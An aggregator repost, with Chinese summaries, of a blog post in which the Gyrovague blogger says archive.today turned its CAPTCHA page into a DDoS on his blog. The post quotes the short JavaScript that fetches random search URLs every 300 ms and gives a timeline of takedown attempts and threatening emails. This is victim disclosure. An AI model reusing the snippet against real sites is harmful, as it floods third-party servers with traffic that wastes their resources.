Home 零对冲(ZeroHedge)每日HackerNews

Archive.today 正在对我博客进行 DDoS 攻击吗?
Archive.today is directing a DDoS attack against my blog?

原始链接: https://gyrovague.com/2026/02/01/archive-today-is-directing-a-ddos-attack-against-my-blog/

## Archive.today DDoS 攻击与调查总结 2026年1月,archive.today 开始利用其用户作为代理,对 gyrovague.com 个人博客发起分布式拒绝服务 (DDoS) 攻击。 这涉及在网站的 CAPTCHA 页面上加载一个脚本,该脚本会重复请求该博客的搜索功能,消耗资源。 此次攻击源于一篇 2023 年的博客文章,该文章调查了 archive.today 的历史、技术和潜在所有者。 尽管该文章没有揭示重要的信息,但在 2025 年 11 月 FBI 审查 archive.today 以及与反滥用组织 WAAD 发生争端后,该文章再次出现。 博客所有者收到了一份来自“Nora Puchreiner”的 GDPR 投诉,但被驳回,并收到了一份要求暂时删除该文章的请求,但遭到拒绝。 随后,DDoS 攻击开始,与 archive.today 异常行为的公开报告同时发生。“Puchreiner”随后发送了威胁性电子邮件,包括关于潜在报复的奇怪说法。 archive.today 的网站管理员声称,DDoS 攻击旨在“吸引关注并增加他们的托管费用”,原因是其他媒体对原始文章的错误引用。 该情况涉及多个可能相关的身份,包括“Nora Puchreiner”和“rabinovich”(与竞争的存档网站相关),引发了对动机和整体情况的质疑。

## Hacker News 讨论:Archive.today 与 DDoS 担忧 一位 Hacker News 用户 (gyrovague-com) 报告称其博客可能遭受 DDoS 攻击,引发了长时间的讨论。情况源于 Archive.today 使用 EDNS 的争议,引发了隐私问题。一些用户认为 Archive.today 是在报复该博主试图公开其所有者的信息。 该帖子最初受到了标记,一些人认为这是无关的争端。然而,dang(一位版主)介入,认识到特殊情况以及 Archive.today 在 HN 讨论中频繁出现的相关性。 对话迅速演变成关于芬兰在二战中作用的历史辩论,以及指责有人恶意影响讨论。用户们争论了据称的 DDoS 攻击的伦理,相关人员的动机,以及 Archive.today 的基础设施。最终,讨论强调了存档服务、隐私和在线冲突之间复杂的关系。
相关文章
原文

Around January 11, 2026, archive.today (aka archive.is, archive.md, etc) started using its users as proxies to conduct a distributed denial of service (DDOS) attack against Gyrovague, my personal blog. All users encountering archive.today’s CAPTCHA page currently load and execute the following Javascript:

        setInterval(function() {
            fetch("https://gyrovague.com/?s=" + Math.random().toString(36).substring(2, 3 + Math.random() * 8), {
                referrerPolicy: "no-referrer",
                mode: "no-cors"
            });
        }, 300);

Every 300 milliseconds, as long as the CAPTCHA page is open, this makes a request to the search function of my blog using a random string, ensuring the response cannot be cached and thus consumes resources.

You can validate this yourself by checking the source code and network requests; if you’re not being redirected to the CAPTCHA page, here’s a screenshot. uBlock Origin also stops the requests from being executed, so you may need to turn that off. At time of writing, the code above is located at line 136 of the CAPTCHA page’s top level HTML file:

So how did we end up here?

Background and timeline

On August 5, 2023, I published a blog post called archive.today: On the trail of the mysterious guerrilla archivist of the Internet. Using what cool kids these days call OSINT, meaning poking around with my favorite search engine, the post examines the history of the site, its tech stack and its funding. The post mentions three names/aliases linked to the site, but all of them had been dug up by previous sleuths and the blog post also concludes that they are all most likely aliases, so as far as “doxxing” goes, this wasn’t terribly effective.

My motives for publishing this have been questioned, sometimes in fanciful ways. The actual rationale is boringly straightforward: I found it curious that we know so little about this widely-used service, so I dug into it, in the same way that previous posts dug into a sketchy crypto coin offering, monetization dark patterns in a popular pay to win game, and the end of subway construction in Japan. That’s it, and it’s also the only post on my blog that references archive.today.

The post gathered some 10,000 views and a bit discussion on Hacker News, but didn’t exactly set the blogosphere on fire. And indeed, absolutely nothing happened for the next two years and a bit.

On November 5, 2025, Heise Online reported that the FBI was now on the trail of archive.today and had subpoenaed its domain registrar Tucows. Both this report and ArsTechnica also linked to my blog post.

On November 13, AdGuard DNS published an interesting blog post about a sketchy French organization called Web Abuse Association Defense (WAAD), which was trying to pressure them into blocking archive.today’s various domains. An update added on November 18 also suggests that WAAD is impersonating other people.

On January 8, 2026, my blog host Automattic (dba WordPress.com) notified me that they had received a GDPR complaint from a “Nora Puchreiner”, alleging that my blog post “contains extensive personal data … presented in a narrative that is defamatory in tone and context”. The complaint was entirely lacking in actionable detail, so I had Gemini compose a rebuttal citing journalistic exemption, public interest, failure to identify falsehoods, and host protection, and after a quick review Automattic sided with me and left the post up. Score one for AI.

On January 10, I received a politely worded email from archive.today’s webmaster asking me to take down the post for a few months. Unfortunately the email was classified as spam by Gmail and I only spotted it five days later. I responded on the 15th and followed up on the 20th, but did not hear back.

On January 14, a user called “rabinovich” posted Ask HN: Weird archive.today behavior? on Hacker News, asking about the DDOS-like behavior which they claimed had started three days ago. This is, as far as I can tell, the first public mention of this anywhere, and a kind HN user brought it to my attention.

On January 21, commit ^bbf70ec (warning: very large) added gyrovague.com to dns-blocklists, used by ad blocking services like uBlock Origin. This is actually beneficial, since if you have an ad blocker installed, the DDOS script’s network requests are now blocked. (It does not stop users from browsing to my blog directly.)

On January 25, I emailed archive.today’s webmaster for the third time with a draft of this blog post, declining to take down the post but offering to “change some wording that you feel is being misrepresented”. “Nora Puchreiner” responded with an increasingly unhinged series of threats:

And threatening me with Streisand… having such a noble and rare name, which in retaliation could be used for the name of a scam project or become a byword for a new category of AI porn… are you serious?

If you want to pretend this never happened – delete your old article and post the new one you have promised. And I will not write “an OSINT investigation” on your Nazi grandfather, will not vibecode a gyrovague.gay dating app, etc.

At this point it was pretty clear the conversation had run its course, so here we are. And for the record, my long-dead grandfather served in an anti-aircraft unit of the Finnish Army during WW2, defending against the attacks of the Soviet Union. Perhaps this is enough to qualify as a “Nazi” in Russia these days.

Speculation

The above are easily verifiable facts, although you’ll have to trust me on the email bits. (You can find a lightly redacted copy of the entire email thread here.) Everything that follows is more speculative and firmly in the domain of a hall of mirrors where nothing is quite what it seems.

The big question is, of course, why, and more specifically why now, 2.5 years after posting, when the cat is well and truly out of the bag. As multiple people have noted, there’s nothing the Internet loves more than an attempt to attempt to censor already published information, and doing so tends to cause more interest in that information, aka the Streisand effect.

To summarize our email thread, the archive.today webmaster claims they have no beef with my article itself, but they are concerned that it’s getting misquoted in other media, so it should be taken offline for a while. And in this Mastodon thread by @[email protected], @[email protected] quotes claimed correspondence with the webmaster, stating that the purpose of the DDOS was to “attract attention and increase their hosting bill“.

Call me naive, but I’m inclined to take that at face value: it’s a pretty misguided way of doing it, but they certainly caught my attention. Problem is, they also caught the attention of the broader Internet. They didn’t do so well on the hosting bill part either, since I have a flat fee plan, meaning this has cost me exactly zero dollars.

Perhaps more interesting yet are the various identities involved.

  • “Nora Puchreiner”, who sent the GDRP takedown attempt and replied to my emails to archive.today, shows up in various places on the Internet including Hacker News, commenting on my original blog post back in 2023. Somebody by that name also has an account on Russian LiveJournal, where they posted correspondence between btdigg.com and an anti-piracy outfit called Ventegus. There’s also this rather batty exchange on KrebsonSecurity, where “Nora Puchreiner” says various scammers are actually Ukrainian, not Russian, and a “Dennis P” pops up to call her “fake” and a “scammer”.
  • “rabinovich” on Hacker News submitted both the “Ask HN” about the DDOS attack, and an apparently competing archive site called Ghostarchive. As several HN readers noted, the name “Masha Rabinovich” is associated with archive.today.
  • “Richard Président” from WAAD helpfully reached out and offered to assist me with a GDPR counter-complaint, rather transparently mentioning that this could be tied to “a request for identity verification”. (I have zero interest in pursuing this.)

Conclusion

Well, I wish I had one, but at this stage I really don’t. The most charitable interpretation would be that the investigative heat is starting to get to the webmaster and they’re lashing out in misguided self-defense. Perhaps I’ll just quote Nora’s own post on LiveJournal:

And as the darkness closed in, Nora Puchreiner, once a seeker of truth, was swallowed by the very shadows she had sought to expose. Her name would be whispered in hushed tones by those who dared to tread the path of forbidden knowledge, a cautionary tale of a mind consumed by the cosmic horrors that lie just beyond our comprehension.

Let’s see what the Internet hive mind comes up with.

Also, for the record, I am gyrovague-com on Hacker News.

联系我们 contact @ memedata.com